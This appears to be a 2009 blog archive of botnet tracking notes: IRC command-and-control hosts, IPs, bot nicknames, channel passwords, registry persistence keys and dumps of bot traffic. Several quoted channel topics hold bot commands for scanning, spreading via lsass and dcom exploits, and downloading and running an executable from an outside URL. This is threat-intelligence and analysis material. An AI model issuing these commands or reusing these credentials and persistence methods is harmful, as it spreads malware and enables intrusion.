Month: December 2009

carb0nf1ber.no-ip.org

carb0nf1ber.no-ip.org 94.129.166.204
miraclezdohappen.homeip.net 94.129.132.83

Outgoing connection to remote server: carb0nf1ber.no-ip.org TCP port 15966
Outgoing connection to remote server: miraclezdohappen.homeip.net TCP port 15966
Outgoing connection to remote server: miraclezdohappen.homeip.net TCP port 15966

Registry Changes by all processes
Create or Open
Changes
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run “Policies” = [REG_EXPAND_SZ, value: C:\Programme\Windows Update\winupdates.exe]
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run “Policies” = [REG_EXPAND_SZ, value: C:\Programme\Windows Update\winupdates.exe]
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run “winupdates” = [REG_EXPAND_SZ, value: C:\Programme\Windows Update\winupdates.exe]
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run “winupdates” ...

dec.ham-radio-op.net (6k bots dci bot)

dec.ham-radio-op.net 208.20.225.248

* C&C Server: 208.20.225.248:6667
* Server Password:
* Username: rruwlz
* Nickname: jicifv
* Channel: #dci (Password: dci2)
* Channeltopic: :

Registry Changes by all processes
Create or Open
Changes
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{28ABC5C0-4FCB-11CF-AAX5-81CX1C635612} “StubPath” = c:\RECYCLER\S-1-5-21-1482476501-1644491937-682003330-1013\ise12000.exe
Reads
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\SystemShared “CUAS”
HKEY_CURRENT_USER\Keyboard Layout\Toggle “Language Hotkey”
HKEY_CURRENT_USER\Keyboard Layout\Toggle “Layout Hotkey”
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF “EnableAnchorContext”
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Rpc\SecurityService “DefaultAuthLevel”

File Changes by all processes
New Files
c:\RECYCLER\S-1-5-21-1482476501-1644491937-682003330-1013\Desktop.ini
c:\RECYCLER\S-1-5-21-1482476501-1644491937-682003330-1013\ise12000.exe
c:\RECYCLER\S-1-5-21-1482476501-1644491937-682003330-1013\ise12000.exe
\Device\RasAcd
Opened Files
...

shv4.ath.cx

Requested Host: shv4.ath.cx
Resulting Address: 67.23.11.205

IRC Data
User Name: dpllhq
Host Name: 0
Server Name:
Real Name: USA|5720
Nick Name: USA|5720
Non RFC Conform: 1

Channel
Name: #bote2
Topic Deleted: :.msn | .rarinject | .scan vnc 100 5 999 -r | .scan dcom2-445 50 5 999 -r | .vnc http://www.ohsn.org/postales/cmd.exe | .dcom2-445 http://www.ohsn.org/postales/cmd.exe | .dl http://www.ohsn.org/postales/cmd.exe C:\user.exe 1

Private Message Deleted
Value: :SecureServ!TS@stats.byroe.net PRIVMSG USA|5720 ...

usb.123back.com

* Requested Host: usb.123back.com
* Resulting Address: 89.46.101.186
* IRC Data
  o User Name: nbfspi
  o Host Name: “”
  o Server Name:
  o Real Name: nbfspi
  o Password: 913199
  o Nick Name: vyjdkw
  o Non RFC Conform: 1
    + Channel
      # Name: #n8#
      # Password: trb123trb
    + Notice Message Deleted
      # Value: :Code.Just.For.Me NOTICE AUTH :*** ...

ionela.youdontcare.com

Remote Host: ionela.youdontcare.com
Port Number: 6969

NICK eb00a2g
USER natation “” “Lelystad.NL.EU.UnderNet.Org” :.12Cainele nu se simte amenintat de inteligenta ta.
USERHOST eb00a2g
NICK :vaffadt
AWAY :.5damn , .2i’m good .6…
MODE eb00a2g +i
USER manzoni “” “Lelystad.NL.EU.UnderNet.Org” :.12ioti` inc`un dipendent de laba
NICK :ld40zik
MODE eb00a2g +iwx
USER working2 “” “Lelystad.NL.EU.UnderNet.Org” :.12Ce as fute o ...

synrules.serveirc.com

synrules.serveirc.com 188.165.47.211
Opened listening TCP connection on port: 113

* C&C Server: 188.165.47.211:6667
* Server Password:
* Username: htburv
* Nickname: I-[Scan]-265831
* Channel: #syn (Password: )
* Channeltopic: :no

NICK I-[Scan]-591967
USER sawbsh 0 0 :I-[Scan]-591967
USERHOST I-[Scan]-591967
MODE I-[Scan]-591967 -x+B
JOIN #syn
NOTICE I-[Scan]-591967 :.VERSION mIRC v6.12 Khaled Mardam-Bey.
PRIVMSG #syn :[MAIN]: Status: Ready. Bot Uptime: 0d 0h 0m.
PRIVMSG #syn ...

rose.linkpc.net

* Requested Host: rose.linkpc.net
* Resulting Address: 58.23.127.130

# IRC Data
* User Name: SP2-873
* Host Name: *
* Server Name:
* Real Name: DWI-9625AC2E275
* Nick Name: USA|XP|SP2|801538

# Transport Protocol: TCP
# Remote Address: 58.23.127.130
# Remote Port: 8280
# Protocol: IRC
# Connection Established: 1
# Socket: 1848

v00000000.inluver.com

Remote Host: v00000000.inluver.com
Port Number: 47221

00000000 | 5041 5353 206C 6574 6D65 696E 0D0A 4E49 | PASS letmein..NI
00000010 | 434B 205B 4E30 305F 5553 415F 5850 5F35 | CK [N00_USA_XP_5
00000020 | 3339 3137 3739 5D18 E740 0D0A 5553 4552 | 391779]..@..USER
00000030 | 2053 5032 2D39 3431 202A 2030 203A 434F |  SP2-941 * 0 :CO
00000040 ...

j00000000.inluver.com

Remote Host: j00000000.inluver.com
Port Number: 47221

00000000 | 5041 5353 206C 6574 6D65 696E 0D0A 4E49 | PASS letmein..NI
00000010 | 434B 205B 4E30 305F 5553 415F 5850 5F39 | CK [N00_USA_XP_9
00000020 | 3832 3839 3536 5D18 E740 0D0A 5553 4552 | 828956]..@..USER
00000030 | 2053 5032 2D36 3935 202A 2030 203A 434F |  SP2-695 * 0 :CO
00000040 ...

irc.shkumbimi.net (JimyGJ albanian lamer botnet)

irc.shkumbimi.net DNS_TYPE_A 122.183.243.48 1
122.183.243.48:12351
Nick: `iuxauoe
Username: `iuxauoe
Joined Channel: #.serve with Password kr
Channel Topic for Channel #.serve: “`adv.start lsass 100 5 0 -r -b -s |`sniff.on -s |`adv.start lsass 75 5 0 114.51.x.x -r -s”

Registry Modifications
* The following Registry Keys were created:
  o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices
  o HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\RunOnce
  o HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce
* The newly created Registry ...